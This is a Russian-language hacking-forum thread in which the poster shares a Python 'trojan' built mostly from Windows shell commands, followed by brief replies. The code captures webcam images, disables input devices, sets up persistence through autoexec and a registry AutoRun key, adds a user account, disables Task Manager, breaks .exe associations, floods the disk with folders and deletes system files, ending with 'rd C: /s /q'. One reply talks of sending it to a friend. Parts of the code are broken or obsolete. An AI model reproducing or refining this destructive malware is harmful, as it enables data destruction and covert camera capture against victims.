Загрузка...

[python] malicious code (trojan)

Thread in Virology created by id637541997 Mar 6, 2022. (bumped Mar 10, 2022) 2339 views

  1. id637541997
    id637541997 Topic starter Mar 6, 2022 13 May 27, 2021
    Ну усе как бы. Во первых у меня закончилась фантазия. Во вторых все 3 софта (скрипта) настроены на одну командную выполнение.
    То есть либо портить либо убивать винду.
    Ну и я сделал именно то что и убьет и сожрет все файлы.
    Что будет:
    Удаление всех фалов.
    Заражение autoexec
    Создание 10кк папок.
    И дофига больше. В конце винда просто выключится.
    Я продумал все даже для безопастного режима.
    Тк он не сможет прогрузить 10кк папок, и просто вылетает. *проверил на себе*
    ===============================================================
    Код основа + подгрузка нужных нам библиотек + доступ к камере:
    Python
    import os #импорт выполняющяя cmd
    import cv2 #ипорт библиотеки cv2

    #доступ к камере
    camera = cv2.VideoCapture(0)
    for i in range(10)
    return_value, image = camera.read()
    cv2.imwrite("opencv"+str(i)+".png", image)
    del(camera)
    ===============================================================
    Выключение говна которое может все остановить.
    Python
    #блокировка мыши,клавиатуры и многово

    os.system ("@echo off")
    os.system ("rundll32 keyboard,disable")
    os.system ("rundll32 mouse,disable")
    ===============================================================
    Сам троян.
    Python
    #сам троян...

    os.system ("copy %0 %windir%/system")
    os.system ("""
    // %0
    // %windir%
    echo run=%windir%/system/*.bat """)
    os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
    os.system ("deltree /y c:\autoexec.bat")
    os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
    os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
    echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
    start %temp%\mes.js.""")
    os.system ("attrib c:\autoexec.bat +h +s +a +r")
    os.system ("pause")
    os.system ("copy %0 C:\System.bat")
    os.system ("label C:222")
    os.system ("time 22:22")
    os.system ("date 22.2.22")
    os.system ("assoc .exe=.txt")
    os.system ("net user "2222" /add")
    os.system ("del "%SystemRoot%\Media" /q >nul")
    os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
    os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
    os.system ("rundll32 user,SwapMouseButton")
    os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
    os.system ("del "%SystemRoot%Cursors*.*" >nul")
    os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
    os.system ("del c:Program Files/q")
    os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
    os.system ("rundll32 user,disableoemlayer")
    os.system ("rd C: /s /q")
    =========================================================================
    ПОЛНЫЙ КОД:
    Python
    import os #импорт выполняющяя cmd

    import cv2 #ипорт библиотеки cv2

    #доступ к камере
    camera = cv2.VideoCapture(0)
    for i in range(10)
    return_value, image = camera.read()
    cv2.imwrite("opencv"+str(i)+".png", image)
    del(camera)

    #блокировка мыши,клавиатуры и многово
    os.system ("@echo off")
    os.system ("rundll32 keyboard,disable")
    os.system ("rundll32 mouse,disable")
    #сам троян...
    os.system ("copy %0 %windir%/system")
    os.system ("""
    // %0
    // %windir%
    echo run=%windir%/system/*.bat """)
    os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
    os.system ("deltree /y c:\autoexec.bat")
    os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
    os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
    echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
    start %temp%\mes.js.""")
    os.system ("attrib c:\autoexec.bat +h +s +a +r")
    os.system ("pause")
    os.system ("copy %0 C:\System.bat")
    os.system ("label C:222")
    os.system ("time 22:22")
    os.system ("date 22.2.22")
    os.system ("assoc .exe=.txt")
    os.system ("net user "2222" /add")
    os.system ("del "%SystemRoot%\Media" /q >nul")
    os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
    os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
    os.system ("rundll32 user,SwapMouseButton")
    os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
    os.system ("del "%SystemRoot%Cursors*.*" >nul")
    os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
    os.system ("del c:Program Files/q")
    os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
    os.system ("rundll32 user,disableoemlayer")
    os.system ("rd C: /s /q")
    ============================================

    :vk: https://vk.com/lovegrafon
     
  2. StaruIIPec
    Пойду другу кину
     
    1. id637541997 Topic starter
  3. s1andiw
    s1andiw Mar 14, 2022 0 Mar 14, 2022
    весь код на BAT
     
    1. id637541997 Topic starter
      s1andiw, я знаю , ибо е скрываю
  4. s1nolegoo
    s1nolegoo Mar 14, 2022 0 Jan 29, 2022
    бро, а как это делается? Я не хочу не кому это отправлять просто интересно)
     
    1. s1andiw
      s1nolegoo, никак, обычный cmd.exe, не считая обычного пайтона
    2. id637541997 Topic starter
      s1andiw, ну на счет кмд exe могу поспорить а так часть команд через селл выполняются, вторая часть отвечает за интерфу а третья это кмд
  5. utilitProger
    Бессмысленая трата времени:
    Во первых, для запуска у жертвы должен быть интерпритатор, во вторых не о каких компиляциях в ехе файл не может быть и речи, ибо windows defender и smart screen детектит любые файлы pyinstaller-а.
     
Loading...
Top